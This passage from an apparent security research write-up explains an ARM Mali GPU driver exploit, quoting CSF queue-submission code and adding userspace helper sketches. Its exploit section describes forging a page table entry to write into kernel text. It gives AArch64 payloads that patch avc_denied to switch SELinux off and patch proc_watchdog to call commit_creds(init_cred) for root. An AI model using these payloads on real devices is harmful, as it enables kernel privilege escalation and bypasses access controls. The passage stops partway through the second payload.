	<span class="k">if</span> <span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">==</span> <span class="n">KBASEP_USER_DB_NR_INVALID</span><span class="p">)</span>
		<span class="k">return</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">stream</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">ginfo</span><span class="o">-&gt;</span><span class="n">streams</span><span class="p">[</span><span class="n">csi_index</span><span class="p">];</span>

	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_BASE_LO</span><span class="p">,</span>
			    <span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_BASE_HI</span><span class="p">,</span>
			    <span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_SIZE</span><span class="p">,</span>
			    <span class="n">queue</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">);</span>

	<span class="n">user_input</span> <span class="o">=</span> <span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_USER_INPUT_LO</span><span class="p">,</span>
			    <span class="n">user_input</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">);</span>
	<span class="n">kbase_csf_firmware_cs_input</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">CS_USER_INPUT_HI</span><span class="p">,</span>
			    <span class="n">user_input</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">);</span>

	<span class="p">...</span>
	<span class="n">kbase_csf_ring_cs_kernel_doorbell</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">csi_index</span><span class="p">,</span>
                                <span class="n">group</span><span class="o">-&gt;</span><span class="n">csg_nr</span><span class="p">,</span>
			  <span class="n">ring_csg_doorbell</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">assign_user_doorbell_to_queue</code> checks that the queue is bound and does not have a doorbell assigned yet
(its doorbell number is <code class="language-plaintext highlighter-rouge">KBASEP_USER_DB_NR_INVALID</code>). If so, it assigns the group’s doorbell number to the queue and zaps the
doorbell page currently mapped in the user IO pages VMA, so that the next access faults in the real hardware doorbell page.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">assign_user_doorbell_to_queue</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="k">const</span> <span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">((</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">bind_state</span> <span class="o">==</span> <span class="n">KBASE_CSF_QUEUE_BOUND</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
	    <span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">==</span> <span class="n">KBASEP_USER_DB_NR_INVALID</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">WARN_ON</span><span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">==</span> <span class="n">KBASEP_USER_DB_NR_INVALID</span><span class="p">);</span>
		<span class="n">queue</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">doorbell_nr</span><span class="p">;</span>

		<span class="cm">/* After this the real Hw doorbell page would be mapped in */</span>
		<span class="n">unmap_mapping_range</span><span class="p">(</span>
			<span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">db_filp</span><span class="o">-&gt;</span><span class="n">f_inode</span><span class="o">-&gt;</span><span class="n">i_mapping</span><span class="p">,</span>
			<span class="n">queue</span><span class="o">-&gt;</span><span class="n">db_file_offset</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">,</span>
			<span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Using the real hardware doorbell page (which only gets mapped in for scheduled queues), we
can notify the GPU that a particular command stream has more instructions pending execution.
This is done by writing a value of 1 to offset 0 of the mapped doorbell page. The mapped
input page tells the GPU how far into the queue’s ring buffer it should execute once the queue
is scheduled: it holds the insert offset, a 64-bit value measured from the start of the ring buffer.
The mapped output page holds the extract offset, also a 64-bit value, which indicates how far the GPU
has already consumed instructions. The instructions lying between the extract
offset and the insert offset are what the GPU will execute next.</p>

<p><img src="/assets/mali-csf-exploit/fig5-user-io-pages.png" alt="The three mapped pages for a CSF queue. The hardware doorbell page (written by user): writing 1 to offset 0 notifies the GPU of pending instructions in the queue buffer. The user input page (written by user): write the offset (INSERT_OFFSET; 64-bit value) to execute instructions till at page offset 0. The user output page (written by GPU): GPU writes the offset (EXTRACT_OFFSET; 64-bit value) that it has executed till at page offset 0." /></p>
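<p>From userspace, working with the three pages could look roughly like the sketch below. It assumes 4 KiB pages, the page order used by the fault handler shown earlier (doorbell, then input, then output), both offsets living at page offset 0 as in the figure, and a 32-bit doorbell write; the write width in particular is an assumption. The struct and function names are hypothetical.</p>

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdint.h>

#define USER_IO_PAGE_SIZE 4096u /* assumption: 4 KiB pages */

/* Pointers into the three pages of a mapped user IO region. */
struct user_io_pages {
	volatile uint32_t *doorbell;       /* page 0: hardware doorbell */
	volatile uint64_t *insert_offset;  /* page 1: input page, offset 0 */
	volatile uint64_t *extract_offset; /* page 2: output page, offset 0 */
};

/* Derive the per-page pointers from the base address returned by mmap. */
static struct user_io_pages user_io_pages_from_base(void *base)
{
	uint8_t *p = base;
	struct user_io_pages io = {
		.doorbell = (volatile uint32_t *)p,
		.insert_offset = (volatile uint64_t *)(p + USER_IO_PAGE_SIZE),
		.extract_offset = (volatile uint64_t *)(p + 2 * USER_IO_PAGE_SIZE),
	};

	assert(base != 0);
	return io;
}

/* Publish a new insert offset, then ring the doorbell by writing 1. */
static void submit_up_to(struct user_io_pages *io, uint64_t new_insert)
{
	*io->insert_offset = new_insert;
	/* Make sure the offset is visible before the doorbell write. */
	atomic_thread_fence(memory_order_seq_cst);
	*io->doorbell = 1;
}

/* Bytes of instructions between the extract and insert offsets. */
static uint64_t pending_bytes(const struct user_io_pages *io)
{
	return *io->insert_offset - *io->extract_offset;
}
```

<p>After writing four 64-bit instructions at the start of an empty ring buffer, for instance, one would call <code class="language-plaintext highlighter-rouge">submit_up_to(&amp;io, 32)</code> and then poll the extract offset until it reaches 32.</p>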

<p>To get the CSF scheduler to schedule a particular queue group for execution, we can use the
ioctl <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_KICK</code>. This triggers <code class="language-plaintext highlighter-rouge">kbase_csf_queue_kick</code>, which looks up the
queue that uses the given region as its ring buffer, sets <code class="language-plaintext highlighter-rouge">queue-&gt;pending</code> to 1 and enqueues the submission work.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_queue_kick</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		 <span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_kick</span> <span class="o">*</span><span class="n">kick</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">kick</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span> <span class="o">=</span> <span class="n">region</span><span class="o">-&gt;</span><span class="n">user_data</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">queue</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">atomic_cmpxchg</span><span class="p">(</span><span class="o">&amp;</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">pending</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
			<span class="n">trigger_submission</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">trigger_submission</span><span class="p">))</span>
		<span class="n">enqueue_gpu_submission_work</span><span class="p">(</span><span class="n">kctx</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The handler for the work submitted by <code class="language-plaintext highlighter-rouge">enqueue_gpu_submission_work</code> is
<code class="language-plaintext highlighter-rouge">pending_submission_worker</code>. This schedules the pending queues for submission to the GPU
using <code class="language-plaintext highlighter-rouge">kbase_csf_scheduler_queue_start</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">pending_submission_worker</span><span class="p">(</span><span class="k">struct</span> <span class="n">work_struct</span> <span class="o">*</span><span class="n">work</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* Iterate through the queue list and schedule the pending ones for submission. */</span>
	<span class="n">list_for_each_entry</span><span class="p">(</span><span class="n">queue</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">queue_list</span><span class="p">,</span> <span class="n">link</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">atomic_cmpxchg</span><span class="p">(</span><span class="o">&amp;</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">pending</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">struct</span> <span class="n">kbase_queue_group</span> <span class="o">*</span><span class="n">group</span> <span class="o">=</span>
				<span class="n">get_bound_queue_group</span><span class="p">(</span><span class="n">queue</span><span class="p">);</span>

			<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">group</span> <span class="o">||</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">bind_state</span> <span class="o">!=</span> <span class="n">KBASE_CSF_QUEUE_BOUND</span><span class="p">)</span>
				<span class="n">dev_dbg</span><span class="p">(</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">dev</span><span class="p">,</span> <span class="s">"queue is not bound to a group"</span><span class="p">);</span>
			<span class="k">else</span>
				<span class="n">WARN_ON</span><span class="p">(</span><span class="n">kbase_csf_scheduler_queue_start</span><span class="p">(</span><span class="n">queue</span><span class="p">));</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
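
<p>The handshake on <code class="language-plaintext highlighter-rouge">queue-&gt;pending</code> between the kick path and the worker can be modelled in user space. The following is a minimal sketch using C11 atomics, not driver code: <code class="language-plaintext highlighter-rouge">struct model_queue</code> and both function names are hypothetical. Unlike the kick path shown earlier, which sets <code class="language-plaintext highlighter-rouge">trigger_submission</code> regardless of the exchange result, the model reports whether the flag actually changed.</p>

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical stand-in for the `pending` field of struct kbase_queue. */
struct model_queue {
	atomic_int pending;
};

/* Kick path: flag the queue as pending (0 -> 1).
 * Returns true only if this call changed the flag. */
static bool model_mark_pending(struct model_queue *q)
{
	int expected = 0;

	return atomic_compare_exchange_strong(&q->pending, &expected, 1);
}

/* Worker path: claim the queue (1 -> 0).
 * Returns true if the caller now owns the submission and should start the queue. */
static bool model_claim_pending(struct model_queue *q)
{
	int expected = 1;

	return atomic_compare_exchange_strong(&q->pending, &expected, 0);
}
```

<p>Because the worker clears the flag with a compare-and-exchange, a queue that is kicked several times before the worker runs is still started only once per pass over the queue list.</p>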

<p><code class="language-plaintext highlighter-rouge">kbase_csf_scheduler_queue_start</code> schedules the queue’s group and then, through
<code class="language-plaintext highlighter-rouge">start_stream_sync</code>, calls <code class="language-plaintext highlighter-rouge">program_cs</code>, which programs the command stream information
associated with the queue into pages shared with the CSF firmware.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">start_stream_sync</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">program_cs</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">queue</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_scheduler_queue_start</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">kbase_queue_group</span> <span class="o">*</span><span class="n">group</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">kbdev</span><span class="p">;</span>
	<span class="n">bool</span> <span class="k">const</span> <span class="n">cs_enabled</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">enabled</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">run_state</span> <span class="o">==</span> <span class="n">KBASE_CSF_GROUP_FAULT_EVICTED</span><span class="p">)</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">group</span><span class="o">-&gt;</span><span class="n">run_state</span> <span class="o">==</span>
         <span class="n">KBASE_CSF_GROUP_SUSPENDED_ON_WAIT_SYNC</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">err</span> <span class="o">=</span> <span class="n">scheduler_group_schedule</span><span class="p">(</span><span class="n">group</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">kbasep_csf_scheduler_group_is_on_slot_locked</span><span class="p">(</span><span class="n">group</span><span class="p">))</span> <span class="p">{</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">cs_enabled</span><span class="p">)</span> <span class="p">{</span>
				<span class="p">...</span>
				<span class="n">kbase_csf_ring_cs_kernel_doorbell</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span>
					<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span><span class="p">,</span> <span class="n">group</span><span class="o">-&gt;</span><span class="n">csg_nr</span><span class="p">,</span>
					<span class="nb">true</span><span class="p">);</span>
				<span class="p">...</span>
			<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
				<span class="n">start_stream_sync</span><span class="p">(</span><span class="n">queue</span><span class="p">);</span>
			<span class="p">}</span>
		<span class="p">}</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Tying all the pieces together, we need to do the following in order to execute a series of
instructions on the CSF GPU:</p>

<ol>
  <li>Place GPU instructions in the queue’s ring buffer.</li>
  <li>Write the next <code class="language-plaintext highlighter-rouge">&lt;INSERT_OFFSET&gt;</code> to the user input page.</li>
  <li>Call the <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_KICK</code> ioctl to schedule the queue and notify the GPU
of pending instructions.</li>
  <li>Optionally, add more instructions into the queue, write the new <code class="language-plaintext highlighter-rouge">&lt;INSERT_OFFSET&gt;</code> and
write a value of 1 to the mapped hardware doorbell page to notify the GPU of more
instructions pending.</li>
</ol>

<p>Note: each GPU instruction advances the offset by 8, as instructions are 8 bytes long.</p>

<p>As an example, the following figures show a submission of 3 instructions followed by a
submission of 5 instructions in a ring buffer of size 64.</p>

<p><img src="/assets/mali-csf-exploit/fig6-ring-buffer-submission.png" alt="Ring buffer of size 64. Top: extract offset at 0, insert offset at (3 * 8) % 64 = 24, with three instructions to be executed. Bottom: after submitting five more, insert offset at (8 * 8) % 64 = 0 and extract offset at 3 * 8 = 24; the first three are executed instructions, the remaining are instructions to be executed, and the rest is unused buffer region." /></p>
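
<p>The offset arithmetic in the figure can be checked with a small helper. This is a sketch under the assumptions stated above (8-byte instructions, offsets wrapping at the ring buffer size); <code class="language-plaintext highlighter-rouge">advance_offset</code> and <code class="language-plaintext highlighter-rouge">INSTR_SIZE</code> are illustrative names, not driver symbols.</p>

```c
#include <stdint.h>

#define INSTR_SIZE 8u /* each GPU instruction is 8 bytes long */

/* Offset reached after advancing `offset` by `n_instrs` instructions
 * in a ring buffer of `ring_size` bytes. */
static uint32_t advance_offset(uint32_t offset, uint32_t n_instrs, uint32_t ring_size)
{
	return (offset + n_instrs * INSTR_SIZE) % ring_size;
}
```

<p>For the example in the figure, advancing from 0 by three instructions gives an insert offset of 24, and advancing from 24 by five more wraps around to 0 in a buffer of size 64.</p>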

<h1 id="the-exploit">The exploit</h1>

<p>To recap, we trigger the vulnerability and then allocate a memory region of 513 pages (henceforth
referred to as the “controlled region”) so that our controlled physical page is reused as a level 3
PGD. The next step is to redirect a page of the controlled region to a page in the kernel
text section. To do so, we craft a fake ATE and use it to overwrite an entry in the
controlled PGD. ATEs at level 3 in the Mali memory management code have the 2 least
significant bits (LSBs) set, while ATEs at other levels only have the least significant bit set.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define ENTRY_IS_ATE_L3		3ULL
#define ENTRY_IS_ATE_L02	1ULL
#define ENTRY_ACCESS_BIT (1ULL &lt;&lt; 10)
</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">entry_set_ate</span><span class="p">(</span><span class="n">u64</span> <span class="o">*</span><span class="n">entry</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="n">phy</span><span class="p">,</span>
		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
		<span class="kt">int</span> <span class="k">const</span> <span class="n">level</span><span class="p">,</span> <span class="kt">int</span> <span class="n">inserted_nr_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">level</span> <span class="o">==</span> <span class="n">MIDGARD_MMU_BOTTOMLEVEL</span><span class="p">)</span>
		<span class="n">page_table_entry_set</span><span class="p">(</span><span class="n">entry</span><span class="p">,</span> <span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">phy</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">get_mmu_flags</span><span class="p">(</span><span class="n">flags</span><span class="p">,</span> <span class="n">inserted_nr_pages</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">ENTRY_ACCESS_BIT</span> <span class="o">|</span> <span class="n">ENTRY_IS_ATE_L3</span><span class="p">);</span>
	<span class="k">else</span>
		<span class="n">page_table_entry_set</span><span class="p">(</span><span class="n">entry</span><span class="p">,</span> <span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">phy</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">get_mmu_flags</span><span class="p">(</span><span class="n">flags</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">|</span>
				<span class="n">ENTRY_ACCESS_BIT</span> <span class="o">|</span> <span class="n">ENTRY_IS_ATE_L02</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
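
<p>As a rough illustration of the bottom-level branch above, the value of a level 3 ATE can be computed as follows. This is a sketch, not the driver’s code: <code class="language-plaintext highlighter-rouge">make_l3_ate</code> and <code class="language-plaintext highlighter-rouge">PAGE_MASK_4K</code> are hypothetical names, 4 KiB pages are assumed, and the <code class="language-plaintext highlighter-rouge">mmu_flags</code> argument stands in for whatever <code class="language-plaintext highlighter-rouge">get_mmu_flags</code> returns for the region.</p>

```c
#include <stdint.h>

#define ENTRY_IS_ATE_L3   3ULL
#define ENTRY_ACCESS_BIT  (1ULL << 10)
#define PAGE_MASK_4K      (~0xFFFULL) /* assumption: 4 KiB pages */

/* Build a level 3 ATE value for the page containing `phys_addr`.
 * `mmu_flags` is passed in rather than derived from region flags. */
static uint64_t make_l3_ate(uint64_t phys_addr, uint64_t mmu_flags)
{
	return (phys_addr & PAGE_MASK_4K) | mmu_flags | ENTRY_ACCESS_BIT | ENTRY_IS_ATE_L3;
}
```

<p>With a made-up physical address of <code class="language-plaintext highlighter-rouge">0x80123456</code> and flags of <code class="language-plaintext highlighter-rouge">0x40</code>, the helper yields <code class="language-plaintext highlighter-rouge">0x80123443</code>: the page base, the flags, the access bit and the two low bits that mark a level 3 ATE.</p>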

<p>The <code class="language-plaintext highlighter-rouge">mmu_flags</code> for the ATE depend on the flags set for the region; in the context of the exploit they have the
value 0x40. Writing this new ATE to offset 0 in the first page of the alias region overwrites
the first ATE in the level 3 PGD of the controlled region. Subsequent writes to
the first page of the controlled region then land in the kernel text page that the fake ATE
points to, allowing us to overwrite any kernel function in that page. SELinux
has to be disabled before we attempt to commit new credentials for a privilege escalation, so we first point the fake ATE to the page containing the function <code class="language-plaintext highlighter-rouge">avc_denied</code>, which is used during permission
checking to return a verdict on whether access should be denied.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">noinline</span> <span class="kt">int</span> <span class="nf">avc_denied</span><span class="p">(</span><span class="k">struct</span> <span class="n">selinux_state</span> <span class="o">*</span><span class="n">state</span><span class="p">,</span>
		       <span class="n">u32</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">u32</span> <span class="n">tsid</span><span class="p">,</span>
		       <span class="n">u16</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">u32</span> <span class="n">requested</span><span class="p">,</span>
		       <span class="n">u8</span> <span class="n">driver</span><span class="p">,</span> <span class="n">u8</span> <span class="n">xperm</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
		       <span class="k">struct</span> <span class="n">av_decision</span> <span class="o">*</span><span class="n">avd</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVC_STRICT</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">enforcing_enabled</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
	    <span class="o">!</span><span class="p">(</span><span class="n">avd</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">AVD_FLAGS_PERMISSIVE</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>

	<span class="n">avc_update_node</span><span class="p">(</span><span class="n">state</span><span class="o">-&gt;</span><span class="n">avc</span><span class="p">,</span> <span class="n">AVC_CALLBACK_GRANT</span><span class="p">,</span> <span class="n">requested</span><span class="p">,</span> <span class="n">driver</span><span class="p">,</span>
			<span class="n">xperm</span><span class="p">,</span> <span class="n">ssid</span><span class="p">,</span> <span class="n">tsid</span><span class="p">,</span> <span class="n">tclass</span><span class="p">,</span> <span class="n">avd</span><span class="o">-&gt;</span><span class="n">seqno</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This function can be overwritten by writing to the correct offset in the first page of the controlled
region. The payload used for this is:</p>

<div class="language-armasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">str</span> <span class="nb">xzr</span><span class="err">,</span> <span class="o">[</span><span class="nv">x0</span><span class="o">]</span>
<span class="nl">mov</span> <span class="nb">x0</span><span class="err">,</span> <span class="mi">0</span>
<span class="nl">ret</span>
</code></pre></div></div>

<p>This will set enforcing to 0 in <code class="language-plaintext highlighter-rouge">struct selinux_state</code> (the first argument) and get the function to return 0. Opening any file where access is usually denied, for instance <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/hostname</code>, will invoke <code class="language-plaintext highlighter-rouge">avc_denied</code> and disable SELinux.</p>
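
<p>For reference, the three instructions above occupy 12 bytes once assembled. The sketch below spells out their standard AArch64 encodings as 32-bit words; the helper names are hypothetical and this is not necessarily how the payload was produced for the exploit.</p>

```c
#include <stdint.h>

/* STR Xt, [Xn] (64-bit store, unsigned immediate offset of 0). */
static uint32_t enc_str_x(unsigned rt, unsigned rn)
{
	return 0xF9000000u | ((rn & 31u) << 5) | (rt & 31u);
}

/* MOVZ Xd, #imm16 (the encoding assemblers pick for `mov xd, #imm16`). */
static uint32_t enc_movz_x(unsigned rd, uint16_t imm16)
{
	return 0xD2800000u | ((uint32_t)imm16 << 5) | (rd & 31u);
}

/* RET (returns through x30). */
static uint32_t enc_ret(void)
{
	return 0xD65F03C0u;
}

/* Fill `out` with the three-instruction payload.
 * Register number 31 encodes xzr in the Rt field of STR. */
static void build_payload(uint32_t out[3])
{
	out[0] = enc_str_x(31, 0);  /* str xzr, [x0] */
	out[1] = enc_movz_x(0, 0);  /* mov x0, 0     */
	out[2] = enc_ret();         /* ret           */
}
```

<p>The resulting words are <code class="language-plaintext highlighter-rouge">0xF900001F</code>, <code class="language-plaintext highlighter-rouge">0xD2800000</code> and <code class="language-plaintext highlighter-rouge">0xD65F03C0</code>, stored little-endian in memory.</p>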

<p>Next, all that remains is to call <code class="language-plaintext highlighter-rouge">commit_creds</code> with <code class="language-plaintext highlighter-rouge">init_cred</code> and spawn a root shell. This
time, we craft a fake ATE that points to a function that can be called easily from userspace and
can be overwritten without affecting core kernel functionality. This can be any handler function
for sysfs (e.g. <code class="language-plaintext highlighter-rouge">sel_open_handle_status</code>) or the <code class="language-plaintext highlighter-rouge">sysctl</code> interface in <code class="language-plaintext highlighter-rouge">procfs</code>. I chose the
<code class="language-plaintext highlighter-rouge">proc_watchdog</code> function, which handles access to the kernel parameter
<code class="language-plaintext highlighter-rouge">/proc/sys/kernel/watchdog</code>. The first ATE in the controlled
level 3 PGD is overwritten with this fake ATE so that a GPU write to the corresponding GPU VA overwrites the <code class="language-plaintext highlighter-rouge">proc_watchdog</code> function. The payload is then written to the controlled region using GPU instructions, as
before. It is effectively the following:</p>

<div class="language-armasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">//</span> <span class="nf">Save</span> <span class="nv">stack</span><span class="o">,</span> <span class="nv">prepare</span> <span class="nv">x0</span> <span class="nv">with</span> <span class="nv">init_cred</span>
<span class="nl">stp</span> <span class="nb">x29</span><span class="err">,</span> <span class="nv">x30</span><span class="o">,</span> <span class="o">[</span><span class="nv">sp</span><span class="o">,</span> <span class="o">-</span><span class="mi">16</span><span class="o">]!</span>
<span class="nl">mov</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">xzr</span>
<span class="nl">adrp</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">init_cred_page</span>
<span class="nl">add</span> <span class="nb">x0</span><span class="err">,</span> <span class="nv">x0</span><span class="o">,</span> <span class="nv">init_cred_offset_in_page</span>

<span class="err">//</span> <span class="nf">Prepare</span> <span class="nv">x9</span> <span class="nv">with</span> <span class="nv">commit_creds</span> <span class="nv">address</span>
<span class="nl">mov</span> <span class="nb">x9</span><span class="err">,</span> <span class="nv">xzr</span>
<span class="nl">adrp</span> <span class="nb">x9</span><span class="err">,</span> <span class="nv">commit_creds_page</span>
<span class="nl">add</span> <span class="nb">x9</span><span class="err">,</span> <span class="nv">x9</span><span class="o">,</span> <span class="nv">commit_creds_offset_in_page</span>

<span class="err">//</span> <span class="nf">Call</span> <span class="nv">commit_creds</span>
<span class="nl">blr</span> <span class="nb">x9</span>

